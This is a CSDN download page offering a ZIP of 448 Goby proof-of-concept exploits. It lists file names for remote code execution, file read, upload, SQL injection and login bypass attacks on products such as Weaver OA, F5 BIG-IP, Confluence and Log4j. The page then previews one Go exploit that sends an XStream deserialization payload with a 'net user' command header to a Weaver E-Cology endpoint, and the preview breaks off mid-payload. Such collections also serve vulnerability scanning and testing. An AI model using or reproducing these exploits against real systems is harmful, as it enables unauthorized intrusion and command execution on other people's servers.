Goby最全最新POC共计448个_goby最新poc,goby导入poc资源-CSDN文库

共448个文件

json：370个

go：77个

md：1个

网络安全

安全漏洞

log4j2

5星 · 超过95%的资源需积分: 49 45 浏览量 2022-08-30 22:52:37 上传评论 3 收藏 558KB ZIP 举报

资源详情

资源评论

资源推荐

收起资源包目录

Goby 最全最新POC共计448个（448个子文件）

Weaver_OA_E_Cology_Workflowservicexml_RCE.go 84KB

Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go 81KB

ForgeRock_AM_RCE_CVE_2021_35464.go 25KB

TopSec_TopACM_Remote_Command_Execution.go 10KB

H3C CVM Arbitrary File Upload Vulnerability.go 10KB

landray_oa_treexml_rce.go 10KB

Tongda OA Arbitrary User Login Vulnerability.go 10KB

CNPOWER OA Arbitrary File Upload Vulnerability.go 10KB

nsfocus_resourse.php_arbitrary_file_upload_vulnerability.go 9KB

showDocGo.go 8KB

Atlassian_Confluence_Webwork_OGNL_Inject_CVE_2022_26134.go 8KB

TRS-MAS testCommandExecutor.jsp Remote Command Execution.go 6KB

F5_BIG_IP_login_bypass_CVE_2022_1388.go 6KB

showDocJson.go 6KB

ESAFENET_DLP_dataimport_RCE.go 6KB

H3C_IMC_dynamiccontent.properties.xhtm_RCE.go 6KB

Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go 6KB

Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go 5KB

Tongda_OA_api.ali.php_RCE.go 5KB

QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.go 5KB

Webgrind_File_read_cve_2018_12909.go 5KB

Many_network_devices_have_arbitrary_file_downloads.go 5KB

Longjing_Technology_BEMS_API_1.21_Remote_Arbitrary_File_Download.go 4KB

FLIR_AX8_Arbitrary_File_Download_Vulnerability_CNVD-2021-39018.go 4KB

Node_red_UI_base_Arbitrary_File_Read_Vulnerability_CVE_2021_3223.go 4KB

SPON_IP_network_intercom_broadcast_system_getjson.php_Arbitrary_file_read.go 4KB

TopSec_Reporter_Arbitrary_file_download_CNVD_2021_41972.go 4KB

AceNet_AceReporter_Report_component_Arbitrary_file_download.go 4KB

dahua_DSS_Arbitrary_file_download_cnvd_2020_61986.go 4KB

SPON_IP_network_intercom_broadcast_system_ping.php_RCE.go 4KB

SPON_IP_network_intercom_broadcast_system_exportrecord.php_any_file_download.go 4KB

Panabit_Application_Gateway_ajax_top_backstage_RCE.go 4KB

WangKang_Next_generation_firewall_router_RCE.go 4KB

Panabit_iXCache_ajax_cmd_backstage_RCE.go 4KB

Panabit_Panalog_cmdhandle.php_backstage_RCE.go 4KB

ZhongQing_naibo_Education_Cloud_platform_reset_password.go 4KB

Jellyfin_Audio_File_read_CVE_2021_21402.go 4KB

ZhongQing_naibo_Education_Cloud_Platform_Information_leakage.go 4KB

ShiziyuCms_wxapp.php_File_update.go 4KB

xiaomi_Mi_wiFi_From_File_Read_To_Login_CVE_2019_18370.go 4KB

ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go 4KB

JEEWMS_Arbitrary_File_Read_Vulnerability.go 4KB

SPON_IP_network_intercom_broadcast_system_rj_get_token.php_any_file_read.go 3KB

NVS3000_integrated_video_surveillance_platform_is_not_accessible.go 3KB

Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__tracert_RCE.go 3KB

Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__ping_RCE.go 3KB

Apache Solr Log4j JNDI RCE.go 3KB

Tuchuang_Library_System_Arbitrary_Reading_File_CNVD_2021_34454.go 3KB

Holographic_AI_network_operation_and_maintenance_platform_RCE.go 3KB

HEJIA_PEMS_SystemLog.cgi_Arbitrary_file_download.go 3KB

Many_network_devices_have_password_leaks.go 3KB

ShopXO_download_File_read_CNVD_2021_15822.go 3KB

WangKang_NS_ASG_cert_download.php_File_read.go 3KB

Huijietong_cloud_video_fileDownload_File_read.go 3KB

SECWORLD_Next_generation_firewall_pki_file_download_File_read.go 3KB

D_Link_Dir_645_getcfg.php_Account_password_disclosure_CVE_2019_17506.go 3KB

Selea_OCR_ANPR_SeleaCamera_File_read.go 3KB

D_Link_ShareCenter_DNS_320_system_mgr.cgi_RCE.go 3KB

Selea_OCR_ANPR_get_file.php_File_read.go 3KB

ACTI_camera_images_File_read.go 3KB

LanhaiZuoyue_system_download.php_File_read.go 3KB

LanhaiZuoyue_system_debug.php_RCE.go 3KB

Kingdee_EAS_server_file_Directory_traversal.go 3KB

ZZZCMS_parserSearch_RCE.go 3KB

ZhongkeWangwei_Next_generation_firewall_File_read.go 3KB

TamronOS_IPTV_ping_RCE.go 2KB

JingHe_OA_download.asp_File_read.go 2KB

nsoft_EWEBS_casmain.xgi_File_read.go 2KB

H3C_Next_generation_firewall_File_read.go 2KB

H3C_HG659_lib_File_read.go 2KB

Huijietong_cloud_video_list_Information_leakage.go 2KB

ShiziyuCms_ApigoodsController.class.php_SQL_injection.go 2KB

ShiziyuCms_ApiController.class.php_SQL_injection.go 2KB

HanWang_Time_Attendance_SQL_injection.go 2KB

H3C_SecPath_Operation_Login_bypass.go 2KB

Zhongxing_F460_web_shell_cmd.gch_RCE.go 2KB

Qilai_OA_CloseMsg.aspx_SQL_injection.go 2KB

Apache_HTTP_Server_2.4.48_mod_proxy_SSRF_CVE_2021_40438.json 19KB

Spring_Cloud_Gateway_Actuator_API_SpEL_Code_Injection_CVE_2022_22947.json 14KB

Apache_HTTP_Server_SSRF_CVE-2021-40438.json 12KB

Atlassian_Jira_Path_Traversal_CVE_2021_26086.json 12KB

Apache_HTTP_Server_SSRF_CVE_2021_40438.json 12KB

CVE_2022_22947.json 11KB

Spring_Boot_Actuator_Logview_Path_Traversal_CVE_2021_21234.json 10KB

Oracle_Weblogic_SearchPublicRegistries.jsp_SSRF_CVE_2014_4210.json 10KB

Jellyfin_prior_to_10.7.0_Unauthenticated_Arbitrary_File_Read_CVE_2021_21402.json 10KB

Apache_2.4.49_RCE_CVE_2021_41773_and_2.4.50_CVE_2021_42013.json 9KB

HotelDruid_Hotel_Management_Software_v3.0.3_XSS_CVE_2022_26564.json 9KB

Jetty_WEB_INF_FileRead_CVE_2021_34429.json 9KB

VMware_NSX_Log4shell_CVE-2021-44228.json 8KB

Tianwen_ERP_system__uploadfile.aspx_Arbitraryvfilevupload.json 8KB

VMware_NSX_Log4shell_CVE_2021_44228.json 8KB

DotCMS_Arbitrary_File_Upload_CVE_2022_26352.json 7KB

WSO2_Management_Console_Unrestricted_Arbitrary_File_Upload_RCE_CVE_2022_29464.json 7KB

VMware_vCenter_Log4shell_CVE-2021-44228_(1).json 7KB

Tianwen_ERP_system_FileUpload_CNVD_2020_28119.json 7KB

Weblogic_SSRF.json 7KB

VMware_vCenter_Log4shell_CVE_2021_44228_1.json 7KB

H3C_IMC_RCE.json 7KB

Spring_Framework_Data_Binding_Rules_Spring4Shell_RCE_CVE_2022_22965.json 7KB

共 448 条

package exploits import ( "fmt" "git.gobies.org/goby/goscanner/goutils" "git.gobies.org/goby/goscanner/jsonvul" "git.gobies.org/goby/goscanner/scanconfig" "git.gobies.org/goby/httpclient" "strings" ) func init() { expJson := `{ "Name": "Weaver OA E-Cology Workflowservicexml RCE", "Description": "Weaver OA E-Cology Workflowservicexml RCE", "Product": "Weaver OA E-Cology", "Homepage": "https://www.weaver.com.cn/", "DisclosureDate": "2021-05-19", "Author": "PeiQi", "GobyQuery": "app=\"Weaver-OA\"", "Level": "3", "Impact": "RCE", "Recommendation": "", "References": [ "http://wiki.peiqi.tech" ], "HasExp": true, "ExpParams": [ { "name": "Cmd", "type": "input", "value": "whoami" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "data": "", "data_type": "text", "follow_redirect": true, "method": "GET", "uri": "/" }, "ResponseTest": { "checks": [ { "bz": "", "operation": "==", "type": "item", "value": "200", "variable": "$code" } ], "operation": "AND", "type": "group" } } ], "ExploitSteps": null, "Tags": ["RCE"], "CVEIDs": null, "CVSSScore": "0.0", "AttackSurfaces": { "Application": ["Weaver OA"], "Support": null, "Service": null, "System": null, "Hardware": null } }` ExpManager.AddExploit(NewExploit( goutils.GetFileName(), expJson, func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { uri := "/services%20/WorkflowServiceXml" cfg := httpclient.NewPostRequestConfig(uri) cfg.VerifyTls = false cfg.FollowRedirect = false cfg.Header.Store("Content-type", "text/xml") cfg.Header.Store("Cmd", "net user") cfg.Data = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\"><soapenv:Header/><soapenv:Body><web:doCreateWorkflowRequest><web:string><java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                &#x